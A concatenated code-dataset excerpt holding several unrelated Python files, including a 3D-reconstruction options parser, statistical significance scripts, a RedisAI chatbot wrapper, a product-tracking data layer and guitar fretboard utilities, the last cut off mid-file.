help='pin_memory')\n \n g_train.add_argument('--batch_size', type=int, default=1, help='input batch size')\n #g_train.add_argument('--learning_rate', type=float, default=1e-3, help='adam learning rate')\n g_train.add_argument('--learning_rate', type=float, default=1e-4, help='adam learning rate') # -4 before\n g_train.add_argument('--learning_rateC', type=float, default=1e-3, help='adam learning rate')\n g_train.add_argument('--num_epoch', type=int, default=40, help='num epoch to train')\n g_train.add_argument('--predict_normal', action='store_true')\n\n g_train.add_argument('--freq_plot', type=int, default=10, help='frequency of the error plot')\n g_train.add_argument('--freq_save', type=int, default=50, help='frequency of the save_checkpoints')\n g_train.add_argument('--freq_save_ply', type=int, default=100, help='frequency of the save ply')\n \n g_train.add_argument('--no_gen_mesh', action='store_true')\n g_train.add_argument('--no_num_eval', action='store_true')\n \n g_train.add_argument('--resume_epoch', type=int, default=-1, help='epoch resuming the training')\n g_train.add_argument('--continue_train', action='store_true', help='continue training: load the latest model')\n\n # Testing related\n g_test = parser.add_argument_group('Testing')\n g_test.add_argument('--resolution', type=int, default=256, help='# of grid in mesh reconstruction')\n g_test.add_argument('--test_folder_path', type=str, default=None, help='the folder of test image')\n\n # Sampling related\n g_sample = parser.add_argument_group('Sampling')\n 
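# sampling options control how query points are generated around the surface (sigma = perturbation std-dev, num_sample_* = point counts)\n 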
g_sample.add_argument('--sigma', type=float, default=.005, help='perturbation standard deviation for positions')\n g_sample.add_argument('--reg_distance', type=float, default=.005, help='regression distance threshold')\n\n g_sample.add_argument('--sample_on_surface', default=False, action='store_true', help='Sample on surface for occ')\n g_sample.add_argument('--use_normal_loss', default=False, action='store_true', help='Use normal loss or not')\n g_sample.add_argument('--use_edge_loss', default=False, action='store_true', help='Use edge loss or not')\n g_sample.add_argument('--occ_loss_weight', type=float, default=1, help='occ loss weight')\n g_sample.add_argument('--normal_loss_weight', type=float, default=0.5, help='normal loss weight')\n g_sample.add_argument('--edge_loss_weight', type=float, default=0.25, help='edge loss weight')\n g_sample.add_argument('--num_sample_normals', type=int, default=5000, help='# of sampling points')\n g_sample.add_argument('--num_sample_inout', type=int, default=5000, help='# of sampling points')\n g_sample.add_argument('--num_sample_color', type=int, default=0, help='# of sampling points')\n\n # Model related\n g_model = parser.add_argument_group('Model')\n # General\n g_model.add_argument('--norm', type=str, default='group', help='instance normalization or batch normalization or group normalization')\n g_model.add_argument('--norm_color', type=str, default='instance',\n help='instance normalization or batch normalization or group normalization')\n\n # hg filter specify\n g_model.add_argument('--use_unet', action='store_true', help='Use a unet instead')\n g_model.add_argument('--use_gan_input', action='store_true', help='Use the input of the GAN')\n g_model.add_argument('--gan_epoch', type=int, default=135, help='GAN Epoch to be used')\n\n g_model.add_argument('--num_stack', type=int, default=2, help='# of hourglass')\n #g_model.add_argument('--num_stack', type=int, default=4, help='# of hourglass')\n g_model.add_argument('--num_hourglass', type=int, default=2, help='# of stacked layer of hourglass') #3 before\n g_model.add_argument('--skip_hourglass', action='store_true', help='skip connection in hourglass')\n g_model.add_argument('--hg_down', type=str, default='ave_pool', help='ave pool || conv64 || conv128')\n g_model.add_argument('--hourglass_dim', type=int, default='256', help='256 | 512')\n g_model.add_argument('--hourglass_dim_internal', type=int, default='128', help='256 | 512')\n g_model.add_argument('--skip_downsample', action='store_true')\n\n # Classification General\n g_model.add_argument('--mlp_type', type=str, default='conv1d', help='type of classifier to use')\n g_model.add_argument('--mlp_dim', nargs='+', default=[0, 512, 512, 256, 128, 1], type=int, help='# of dimensions of mlp')\n #g_model.add_argument('--mlp_dim', nargs='+', default=[0, 1024, 512, 256, 128, 1], type=int,help='# of dimensions of mlp')\n g_model.add_argument('--mlp_dim_color', nargs='+', default=[513, 1024, 512, 256, 128, 3],\n type=int, help='# of dimensions of color mlp')\n\n g_model.add_argument('--use_tanh', action='store_true',\n help='using tanh after last conv of image_filter network')\n\n # for train\n parser.add_argument('--random_flip', action='store_true', help='if random flip')\n parser.add_argument('--random_trans', action='store_true', help='if random flip')\n parser.add_argument('--random_scale', action='store_true', help='if random flip')\n parser.add_argument('--no_residual', action='store_true', help='no skip connection in mlp')\n 
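# learning-rate schedule: the LR is multiplied by --gamma at every epoch listed in --schedule\n 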
parser.add_argument('--schedule', type=int, nargs='+', default=[10, 25, 60, 80],\n help='Decrease learning rate at these epochs.')\n parser.add_argument('--gamma', type=float, default=0.5, help='LR is multiplied by gamma on schedule.')\n parser.add_argument('--color_loss_type', type=str, default='l1', help='mse | l1')\n\n # for eval\n parser.add_argument('--val_test_error', action='store_true', help='validate errors of test data')\n parser.add_argument('--val_train_error', action='store_true', help='validate errors of train data')\n parser.add_argument('--gen_test_mesh', action='store_true', help='generate test mesh')\n parser.add_argument('--gen_train_mesh', action='store_true', help='generate train mesh')\n parser.add_argument('--all_mesh', action='store_true', help='generate meshs from all hourglass output')\n parser.add_argument('--num_gen_mesh_test', type=int, default=1, help='how many meshes to generate during testing')\n\n # path\n parser.add_argument('--decoder_base', type=str, default='', help='path to load a pretrained decoder')\n parser.add_argument('--checkpoints_path', type=str, default='./trainedModels', help='path to save checkpoints')\n parser.add_argument('--load_netG_checkpoint_path', type=str, default=None, help='path to save checkpoints')\n parser.add_argument('--load_netC_checkpoint_path', type=str, default=None, help='path to save checkpoints')\n parser.add_argument('--results_path', type=str, default='./generated3DModels', help='path to save results ply')\n parser.add_argument('--load_checkpoint_path', type=str, help='path to save results ply')\n parser.add_argument('--single', type=str, default='', help='single data for training')\n parser.add_argument('--max_train_size', type=int, default=-1, help='max number of training samples')\n\n #for single image reconstruction\n parser.add_argument('--img_path', type=str, help='path for input image')\n\n # aug\n group_aug = parser.add_argument_group('aug')\n group_aug.add_argument('--aug_alstd', type=float, default=0.0, help='augmentation pca lighting alpha std')\n group_aug.add_argument('--aug_bri', type=float, default=0.0, help='augmentation brightness')\n group_aug.add_argument('--aug_con', type=float, default=0.0, help='augmentation contrast')\n group_aug.add_argument('--aug_sat', type=float, default=0.0, help='augmentation saturation')\n group_aug.add_argument('--aug_hue', type=float, default=0.0, help='augmentation hue')\n group_aug.add_argument('--aug_blur', type=float, default=0.0, help='augmentation blur')\n\n # special tasks\n self.initialized = True\n\n return parser\n\n def gather_options(self):\n # initialize parser with basic options\n if not self.initialized:\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser = self.initialize(parser)\n\n self.parser = parser\n\n return parser.parse_args()\n\n def print_options(self, opt):\n message = ''\n message += '----------------- Options ---------------\\n'\n for k, v in sorted(vars(opt).items()):\n comment = ''\n default = self.parser.get_default(k)\n if v != default:\n comment = '\\t[default: %s]' % str(default)\n message += '{:>25}: {:<30}{}\\n'.format(str(k), str(v), comment)\n message += '----------------- End -------------------'\n print(message)\n\n def setNameFromOptions(self, opt):\n baseName = opt.name\n type_name = \"OCC\"\n\n if opt.predict_normal:\n type_name = \"NORMAL\"\n elif opt.render_normals:\n type_name = \"RENDER\"\n\n input_type = \"nml\" if opt.use_normal_input else \"bp\"\n if 
opt.use_gan_input:\n input_type = \"gan\"\n\n filter_hg = str(opt.hourglass_dim)\n sample_count = str(opt.num_sample_inout)\n nml_loss = \"nml_loss\" if opt.use_normal_loss else \"\"\n edge_loss = 'edge_loss' if opt.use_edge_loss else \"\"\n skip_ds = \"sds\" if opt.skip_downsample else \"\"\n super_res = \"superRes\" if opt.super_res else \"\"\n unet = \"unet\" if opt.use_unet else \"hg\"\n mlp_type = opt.mlp_type\n mlp_sizes = '_'.join(str(x) for x in opt.mlp_dim)\n\n return '_'.join(str(x) for x in [baseName, type_name, unet, input_type, super_res, filter_hg, sample_count,\n nml_loss, edge_loss, skip_ds, mlp_type])\n\n def saveOptToFile(self, opt):\n savePath = '%s/%s/options.txt' % (opt.checkpoints_path, opt.name)\n with open(savePath, \"w\") as f:\n json.dump(opt.__dict__, f, indent=2)\n\n print(\"Saved options to {0}\".format(savePath))\n\n def loadOptFromFile(self, name, checkPointsPath = \"./trainedModels\"):\n loadPath = '%s/%s/options.txt' % (checkPointsPath, name)\n\n if os.path.exists(loadPath):\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser = self.initialize(parser)\n opt = parser.parse_args(\"\")\n\n with open(loadPath, 'r') as f:\n opt.__dict__ = json.load(f)\n\n return opt\n else:\n return None\n\n def parse(self):\n opt = self.gather_options()\n\n #Set first mlp dim according to filter sizes\n if opt.use_unet:\n opt.mlp_dim[0] = 512+3\n else:\n opt.mlp_dim[0] = opt.hourglass_dim * opt.num_views + 3\n\n #if opt.super_res:\n # opt.mlp_dim[0] = opt.mlp_dim[0] + opt.hourglass_dim//2 * opt.num_views\n\n if opt.predict_normal:\n opt.mlp_dim[-1] = 3\n\n #if opt.max_train_size != -1:\n #opt.no_gen_mesh = True\n\n opt.name = self.setNameFromOptions(opt)\n return opt\n","sub_path":"lib/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":13358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"217962541","text":"import pickle\nimport numpy as np\nfrom scipy.stats import wilcoxon\n\nfrom evaluator.evaluate_crowdflower_results import options, CFResults, read_search_results, calculate_kendalls_taus, \\\n algorithm_order, algorithm_abbreviations\n\n\ndef calc_invalid_treatment_significance():\n cache_include = options['include_invalid_in_kendalls_tau']\n cache_relevance = options['kendalls_tau_invalid_relevance']\n cf_results = CFResults()\n search_results = read_search_results()\n options['include_invalid_in_kendalls_tau'] = False\n tau_results_remove = calculate_kendalls_taus(cf_results, search_results)\n options['include_invalid_in_kendalls_tau'] = True\n options['kendalls_tau_invalid_relevance'] = 1.5\n tau_results_set_medium = calculate_kendalls_taus(cf_results, search_results)\n options['kendalls_tau_invalid_relevance'] = 0\n tau_results_set_low = calculate_kendalls_taus(cf_results, search_results)\n options['include_invalid_in_kendalls_tau'] = cache_include\n options['kendalls_tau_invalid_relevance'] = cache_relevance\n\n for alg in algorithm_order:\n remove = []\n medium = []\n low = []\n for pair in tau_results_remove[algorithm_abbreviations[alg]]['per_query']:\n remove.append(pair[1])\n for pair2 in tau_results_set_medium[algorithm_abbreviations[alg]]['per_query']:\n if pair2[0] == pair[0]:\n medium.append(pair2[1])\n for pair3 in tau_results_set_low[algorithm_abbreviations[alg]]['per_query']:\n if pair3[0] == pair[0]:\n low.append(pair3[1])\n print(alg)\n print(wilcoxon(remove, medium))\n print(wilcoxon(remove, low))\n print(wilcoxon(low, 
medium))\n\n\ndef calc_algorithm_significane():\n ndcg_dict = pickle.load(open(\"obj/ndcg_dict.pkl\", \"rb\"))\n\n # Read query list\n queries = list(ndcg_dict[0]['ndcg_per_algorithm_dict'][algorithm_order[0]]['query_ndcg_dict'].keys())\n queries.remove('kingdom hearts 2')\n queries.sort()\n\n # Init Wilcoxon dict\n wilcoxon_dict = [{'k': k, 'matrix':None, 'algorithms': {a:[] for a in algorithm_order}} for k in range(0, 10)]\n\n # Read NDCGs\n for k in range(0, 10):\n ndcg_per_algorithm_dict = ndcg_dict[k]['ndcg_per_algorithm_dict']\n\n for algorithm in algorithm_order:\n algorithm_dict = ndcg_per_algorithm_dict[algorithm]\n algorithm_queries_dict = algorithm_dict['query_ndcg_dict']\n\n for query in queries:\n wilcoxon_dict[k]['algorithms'][algorithm].append(algorithm_queries_dict[query])\n\n # Calc Wilcoxon matrices\n for k in wilcoxon_dict:\n k = k['k']\n wilcoxon_matrix = np.empty((len(algorithm_order),len(algorithm_order)))\n for a in algorithm_order:\n for b in algorithm_order:\n p = wilcoxon(wilcoxon_dict[k]['algorithms'][a],wilcoxon_dict[k]['algorithms'][b]).pvalue\n wilcoxon_matrix[algorithm_order.index(a)][algorithm_order.index(b)] = p\n\n wilcoxon_dict[k]['matrix'] = wilcoxon_matrix\n\n # Print wanted significance\n algorithm_a = 'tfidf-link_pagerank-harmonic_mean_with_weighted_pr'\n algorithm_b = 'tfidf-combined_bl_pagerank-harmonic_mean_with_weighted_pr'\n for k in wilcoxon_dict:\n k = k['k']\n print('k = {}'.format(k+1))\n p = wilcoxon_dict[k]['matrix'][algorithm_order.index(algorithm_a)][algorithm_order.index(algorithm_b)]\n print(p)\n\n print('Median {}: {}'.format((algorithm_a),np.median(wilcoxon_dict[k]['algorithms'][algorithm_a])))\n print('Median {}: {}'.format((algorithm_b),np.median(wilcoxon_dict[k]['algorithms'][algorithm_b])))\n\n","sub_path":"questionnaire-evaluator/evaluator/significance.py","file_name":"significance.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"11050700","text":"def d_to_b(num,n):\n bi = [] \n while num > 0 :\n bi.append(num%2)\n num = num//2\n\n while len(bi) < n:\n bi.append(0)\n\n return bi\n\ndef print_bit(bi):\n for i in bi[::-1] :\n print(i,end=' ')\n\nn = int(input())\n\nfor i in range(2**n) :\n print_bit(d_to_b(i,n))\n print()","sub_path":"Algo201/problem_of_the_class/python/bit_but_iterlation.py","file_name":"bit_but_iterlation.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"4297691","text":"from .logger import set_logger\nfrom sklearn import preprocessing\nfrom ..utils import shaping_utils\nimport numpy as np\n\n\ndef preprocess_dataset(X, Y, n_steps):\n '''\n Return preprocessed dataset from raw dataset.\n Returns:\n - dataset (list): X (np.arr), Y (np.arr)\n '''\n\n set_logger.info(\"Starting preprocessing...\")\n\n return preprocess_features(\n *preprocess_labels(*segment_sequences(X, Y, n_steps)))\n\n\ndef preprocess_features(X, Y):\n '''\n Scale the feature vectors using scikit preprocessing.\n '''\n\n X = np.array(X, dtype=np.float32)\n old_shape = X.shape\n X = X.reshape((-1, X.shape[2]))\n assert(len(X.shape) == 2) # Double check that X is 2d.\n\n X = preprocessing.maxabs_scale(X, copy=False)\n X = X.reshape(old_shape)\n return X, Y\n\n\ndef preprocess_labels(X, Y):\n '''\n Numpify labels.\n '''\n\n return X, np.array(Y, dtype=np.float32)\n\n\ndef segment_sequences(X, Y, n_steps):\n \"\"\"\n Segment sequence features into 
segments of uniform length.\n \"\"\"\n\n new_X = []\n new_Y = []\n\n for i in range(len(X)):\n segments = shaping_utils.segment_vector(np.array(X[i]), n_steps)\n new_X += segments\n new_Y += len(segments) * [Y[i]]\n\n set_logger.debug(\"Sequence segmentation complete.\")\n set_logger.debug(\"Average segments per sequence: \" +\n str(len(new_X) / len(X)))\n\n return np.array(new_X), np.array(new_Y)\n\n","sub_path":"Template/datasets/example/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"243813322","text":"import math\n\nusers = {\n\n \t\t \"Paulo\": {\"Coldplay\": 5.0, \"Imagine Dragons\": 4.0, \"Cage the Elephant\": 4.3, \"Artic Monkeys\": 3.0},\n\n \t\t \"Eloa\": {\"Coldplay\": 3.0, \"Imagine Dragons\": 2.5, \"Cage the Elephant\": 5.0, \"Fleet Foxes\": 3.5},\n\n \t\t \"Will\": {\"Imagine Dragons\": 5.0, \"Cage the Elephant\": 1.5, \"Fleet Foxes\": 2.0, \"The Ink Spots\": 4.0},\n\n \t\t \"João\": {\"Coldplay\": 1.5, \"Cage the Elephant\": 3.0, \"Fleet Foxes\": 3.5, \"Artic Monkeys\": 5.0}, \n\n \t\t \"Miguel\": {\"Coldplay\":5.0, \"Fleet Foxes\": 4.6, \"Artic Monkeys\": 5.0, \"The Ink Spots\": 1.0},\n\n \t\t }\n\ndef manhattan(rating1, rating2):\n\n\tdistance = 0\n\tfor i in rating1:\n\t\tif i in rating2:\n\t\t\tdistance = distance + abs(rating1[i] - rating2[i])\n\n\treturn distance\n\ndef computeNearestNeighbor(username, users):\n\n\tdistances = []\n\tfor user in users:\n\t\tif user != username:\n\t\t\tdistance = manhattan(users[user], users[username])\n\t\t\tdistances.append((distance, user))\n\n\tdistances.sort()\n\treturn distances\n\ndef recommend(username, users):\n\n\tnearest = computeNearestNeighbor(username, users)[0][1]\n\trecommendations = []\n\n\tneighborRatings = users[nearest]\n\tuserRatings = users[username]\n\n\tfor i in neighborRatings:\n\t\tif not i in userRatings:\n\t\t\trecommendations.append((i, neighborRatings[i]))\n\n\treturn sorted(recommendations, key=lambda artistTuple: artistTuple[1], reverse = True)\n\n\"\"\" Paulo Guilherme - 1815310087 \"\"\"\n\"\"\" Sistema de recomendação colaborativa utilizando minhas bandas favoritas e meus amigos.\"\"\"\n\nprint(\"\\nTestando a funcção Manhattan:\")\na = manhattan(users[\"Eloa\"], users[\"Paulo\"])\nprint(a)\n\nprint(\"\\nTestando a funcção de Vizinho mais Próximo:\")\nb = computeNearestNeighbor(\"Paulo\", users)\nprint(b)\n\nprint(\"\\nTestando a funcção de Recomendação para o usuário informando:\")\nc = recommend(\"Miguel\", users)\nprint(c)\n","sub_path":"AP1/Filtragem_Colaborativa.py","file_name":"Filtragem_Colaborativa.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"265427103","text":"from os.path import dirname\n\nimport numpy as np\nimport redisai as rai\nimport ml2rt\nimport utils\n\n\nclass DB:\n def __init__(self, host='localhost', port=6379, db=0):\n self.max_len = 10\n self.con = rai.Client(host=host, port=port, db=db)\n\n def initiate(self):\n encoder_path = f'{dirname(__file__)}/assets/encoder.pt'\n decoder_path = f'{dirname(__file__)}/assets/decoder.pt'\n en_model = ml2rt.load_model(encoder_path)\n de_model = ml2rt.load_model(decoder_path)\n self.con.modelstore('encoder', backend='torch', device='cpu', data=en_model)\n self.con.modelstore('decoder', backend='torch', device='cpu', data=de_model)\n\n\n def process(self, nparray):\n # 4 = no layers + no directions, 
1 = batch, 500 = hidden size\n # dummy_hidden = np.zeros((2, 1, 500), dtype=np.float32)\n # self.con.tensorset('hidden', tensor=dummy_hidden)\n self.con.tensorset('sentence', tensor=nparray)\n self.con.tensorset('length', tensor=np.array([nparray.shape[0]]).astype(np.int64))\n self.con.modelexecute('encoder', inputs=['sentence', 'length'], outputs=['e_output', 'hidden'])\n hidden = self.con.tensorget('hidden')[:2]\n self.con.tensorset('hidden', tensor=hidden)\n inter_tensor = np.array(utils.SOS_token, dtype=np.int64).reshape(1, 1)\n self.con.tensorset('d_input', tensor=inter_tensor)\n i = 0\n out = []\n while i < self.max_len:\n i += 1\n self.con.modelexecute(\n 'decoder',\n inputs=['d_input', 'hidden', 'e_output'],\n outputs=['d_output', 'hidden'])\n d_output = self.con.tensorget('d_output')\n # d_output_ret = d_output.reshape(1, utils.voc.num_words)\n ind = int(d_output.argmax())\n if ind == utils.EOS_token:\n break\n inter_tensor = np.array(ind, dtype=np.int64).reshape(1, 1)\n self.con.tensorset('d_input', tensor=inter_tensor)\n if ind == utils.PAD_token:\n continue\n out.append(ind)\n return utils.indices2str(out)\n\n\nif __name__ == '__main__':\n redis_db = DB()\n","sub_path":"redis_db.py","file_name":"redis_db.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"259994391","text":"import matplotlib\nimport matplotlib.pyplot as plt \nimport matplotlib.ticker as mticker \nimport matplotlib.dates as mdates\nfrom matplotlib import style \nimport numpy as np \nimport time\nimport functools\nimport pandas as pd \nimport sys\n\n\ndef percentChange(startPoint, currentPoint):\n\ttry:\n\t\tx = ((float(currentPoint)-startPoint)/abs(startPoint))*100\n\t\tif x == 0.0:\n\t\t\treturn 0.0000000001\n\t\telse:\n\t\t\treturn x\n\t\n\texcept:\n\t\treturn 0.0000000001\n\n\n\n\ndef patternStorage(file):\n\n\t# formating of the csv data file\n\n\tdf = pd.read_csv(file, parse_dates=True, \n\t\t\t\t\t\t\t \t\t\tindex_col='DateTime', \n\t\t\t\t\t\t\t \t\t\tnames=['Tid', 'Dealable', 'Pair', 'DateTime', 'Buy', 'Sell'])\n\t#df.drop(['lTid'], 1, inplace=True)\n\tdel df['Tid']\n\tdel df['Dealable']\n\tdel df['Pair']\n\n\n\tbid = df['Buy'].values\n\task = df['Sell'].values\n\n\tallData = ((bid + ask) / 2) \n\n\tpatternAr = []\n\tperformanceAr = []\n\n\tpatStarttime = time.time()\n\tx = len(allData) - 60 \n\ty = 31\n\n\twhile y < x: \n\t\tpattern = []\n\t\tfor i in range(1, 31):\n\t\t\tpattern.append(percentChange(allData[y-30], allData[y+(i-30)]))\n\t\n\n\t\toutcomeRange = allData[y+20:y+30] \n\t\tcurrentPoint = allData[y]\n\n\t\ttry: \n\t\t\tavgOutcome = functools.reduce(lambda x, y: x+y, outcomeRange) / len(outcomeRange)\n\t\texcept Exception as e: \n\t\t\tprint(str(e))\n\t\t\tavgOutcome = 0\n\n\t\tfutureOutcome = percentChange(currentPoint, avgOutcome)\n\n\t\tpatternAr.append(pattern)\n\t\tperformanceAr.append(futureOutcome)\n\n\t\ty += 100\n\n\tprint(patternAr)\n\tprint(performanceAr)\n\n\tpatterndf = pd.DataFrame(patternAr)\n\tpatterndf.to_csv('AUD_CADpatterns.csv', index=False, header=False)\n\n\tperformancedf = pd.DataFrame(performanceAr)\n\tperformancedf.to_csv('AUD_CADperformance.csv', index=False, header=False)\n\n\n\n\n# csv data file from Gain\nfile = 'AUD_CAD_Week1.csv'\n\n\n\npatternStorage(file)\n","sub_path":"storage_pc.py","file_name":"storage_pc.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
+{"seq_id":"479603913","text":"from ..models import Product, Tracking\nimport datetime, pytz\n\n\nclass ProductDataLayer(object):\n @classmethod\n def create_product(cls, name) -> Product:\n '''\n create product factory function\n '''\n p = Product(name=name)\n p.save()\n return p\n\n @classmethod\n def get_product_by_id(cls, id) -> Product:\n '''\n get product by product id\n '''\n return Product.objects.get(id=id)\n\n @classmethod\n def get_all_products(cls):\n '''\n return all product objects\n '''\n return Product.objects.all()\n\n @classmethod\n def filter_product_queryset_by_text(cls, queryset, search_term):\n '''\n case insensitive text filtering in name field of product queryset\n '''\n if search_term:\n return queryset.filter(name__icontains=search_term)\n return queryset\n\n @classmethod\n def create_tracking(cls, data) -> Tracking:\n '''\n create tracking function\n '''\n p = Product.objects.get(id=data.get('product'))\n t = Tracking(\n product=p, timestamp=data.get('timestamp'),\n latitude=data.get('latitude'), longitude=data.get('longitude'),\n elevation=data.get('elevation')\n )\n t.save()\n return t\n\n\n @classmethod\n def get_tracking_by_id(cls, id) -> Tracking:\n '''\n get tracking by id\n '''\n return Tracking.objects.prefetch_related('product').get(id=id)\n\n @classmethod\n def get_all_tracking(cls):\n '''\n get all tracking models\n '''\n return Tracking.objects.prefetch_related('product').all()\n\n @classmethod\n def filter_tracking_queryset_by_text(cls, queryset, search_term):\n '''\n search queryset by text for tracking models\n '''\n if search_term:\n queryset = queryset.filter(\n product__name__icontains=search_term\n )\n return queryset\n\n @classmethod\n def filter_tracking_queryset_by_product_id(cls, queryset, id):\n if id:\n queryset = queryset.filter(\n product__id=id\n )\n return queryset\n\n @classmethod\n def filter_tracking_queryset_by_date(cls, queryset, date_string, timezone):\n '''\n timezone filtering based on timezone\n '''\n try:\n if timezone:\n d = datetime.datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%S.%fZ')\n aware_date = pytz.timezone(timezone).localize(d)\n date_time = aware_date.astimezone(pytz.timezone('UTC'))\n end_date_time = date_time + datetime.timedelta(hours=23, minutes=59)\n if date_time and end_date_time:\n queryset = queryset.filter(\n timestamp__gte=date_time, timestamp__lte=end_date_time\n )\n except Exception as exc:\n pass\n return queryset\n\n\n\n @classmethod\n def edit_tracking(cls, id, data):\n '''\n edit tracking models\n '''\n p = cls.get_tracking_by_id(id)\n product = cls.get_product_by_id(data.get('product'))\n p.product = product\n p.timestamp = data.get('timestamp')\n p.latitude = data.get('latitude')\n p.longitude = data.get('longitude')\n p.elevation = data.get('elevation')\n p.save()\n return p\n\n @classmethod\n def edit_product(cls, id, data):\n '''\n edit product object\n '''\n p = cls.get_product_by_id(id)\n p.name = data.get('name')\n p.save()\n return p\n","sub_path":"products/datalayers/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"209438450","text":"r\"\"\"\nA collection of utility functions to locate notes on the fretboard.\n\nFunctions are provided for both directions.\n\"\"\"\n\nr\"\"\"\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without 
restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport logging\n\nfrom collections import Counter\n\nLOG = logging.getLogger(__name__)\n\n# only consider sharps, theoretic distinction is irrelevant here\n# this way, there is always a half-step between notes\nNOTE_SEQUENCE = ['C', 'C#', 'D', 'D#', 'E', 'F',\n 'F#', 'G', 'G#', 'A', 'A#', 'B']\n# strings are determined by their open value: a note and an octave\n# important: these are ordered from high to low!\nSTANDARD_STRINGS = [('E', 4), ('B', 3), ('G', 3),\n ('D', 3), ('A', 2), ('E', 2)]\nSUPPORTED_FRETS = 25 # standard electric 22 + bends + open strings\nHS_PER_OCTAVE = len(NOTE_SEQUENCE) # or 12, but just keeping stuff connected\n\ndef fret2note(fret, string_num):\n r\"\"\"\n Given a fret number and a string, return the note and octave.\n >>> fret2note(5, 5)\n ('A', 2)\n \"\"\"\n string_note = STANDARD_STRINGS[string_num]\n current_index = NOTE_SEQUENCE.index(string_note[0])\n note_index = (current_index + fret) % HS_PER_OCTAVE\n octave_increase = (current_index + fret) // HS_PER_OCTAVE\n return (NOTE_SEQUENCE[note_index], string_note[1] + octave_increase)\n\n\ndef frets(note):\n r\"\"\"\n Given a note, generate the frets and strings\n where the note can be found on a six-string in standard tuning.\n Strings with the same note value are differentiated by their\n octave, which is the final value in the returned tuple.\n\n `note`'s value can range from 'A' to 'G#', its octave is at least\n 2 and is at most 6.\n\n Note that there may be some borderline cases when bends are used.\n The current implementation assumes SUPPORTED_FRETS - 1 actual frets\n and no bends, so the highest value that can be returned is\n (SUPPORTED_FRETS - 1, ('E', 4)).\n\n Results are always returned for low strings before high strings.\n\n >>> next(frets(('E', 3)))\n (12, ('E', 2))\n \"\"\"\n LOG.debug('Finding frets for {note}'.format(note=note))\n string = _lowest_string_with(note)\n low_to_high_strings = list(reversed(STANDARD_STRINGS))\n if string:\n fret = (NOTE_SEQUENCE.index(note[0]) + HS_PER_OCTAVE * note[1]) -\\\n (NOTE_SEQUENCE.index(string[0]) + HS_PER_OCTAVE * string[1])\n while fret >= 0:\n yield (fret, string)\n successor_index = (low_to_high_strings.index(string) + 1)\n if successor_index >= len(low_to_high_strings):\n return # PEP 479: end the generator with return, not StopIteration\n string = low_to_high_strings[successor_index] \n if string[0] == 'B':\n fret -= 4\n else:\n fret -= 5\n\n\ndef is_limiting(note):\n r\"\"\"\n Determine whether a supplied note is \"limiting\".\n\n Limiting notes are notes which can only be played in one position,\n or which can only be played at the sixth fret or higher.\n\n An assumption here is that only valid notes are supplied.\n >>> is_limiting(('E', 3))\n 
False\n \"\"\"\n count = 0\n below_six = False # something that cannot be played below 6 is limiting\n for fret in frets(note):\n count += 1\n if fret[0] <= 5:\n below_six = True\n return count <= 1 or not below_six\n\n \ndef _lowest_string_with(note):\n r\"\"\"\n Given a note, return the lowest string containing that note on a\n SUPPORTED_FRETS-1-fret guitar in standard tuning with no bends applied.\n >>> _lowest_string_with(('E', 2))\n ('E', 2)\n >>> _lowest_string_with(('E', 8))\n \"\"\"\n LOG.debug('Looking for lowest string with {note}'.format(note=note))\n for string in reversed(STANDARD_STRINGS): # want low to high!\n end_octave = string[1] + ((SUPPORTED_FRETS - 1) // HS_PER_OCTAVE)\n end_half_step = NOTE_SEQUENCE.index(string[0]) +\\\n ((SUPPORTED_FRETS - 1) % HS_PER_OCTAVE)\n if end_half_step >= HS_PER_OCTAVE:\n end_half_step = (end_half_step - HS_PER_OCTAVE) % HS_PER_OCTAVE\n end_octave += 1\n end_note = (NOTE_SEQUENCE[end_half_step], end_octave)\n if compare_notes(string, note) <= 0 and\\\n compare_notes(end_note, note) >= 0:\n return string\n return None\n\n\ndef compare_notes(note, other):\n r\"\"\"\n Given two notes, specified as a value and an octave number,\n return -1, 0 or 1, respectively, depending on whether `note` is\n lower than, equal to or higher than `other`.\n >>> compare_notes(('C', 3), ('A', 3))\n -1\n \"\"\"\n LOG.debug('Comparing notes {note}, {other}'.format(**locals()))\n value = note[1] * 12 + NOTE_SEQUENCE.index(note[0])\n other_value = other[1] * 12 + NOTE_SEQUENCE.index(other[0])\n # Python 3 has no cmp(); (a > b) - (a < b) yields the same -1/0/1\n return (value > other_value) - (value < other_value)\n\n\ndef sane_chords(notes, capo=0):\n r\"\"\"\n 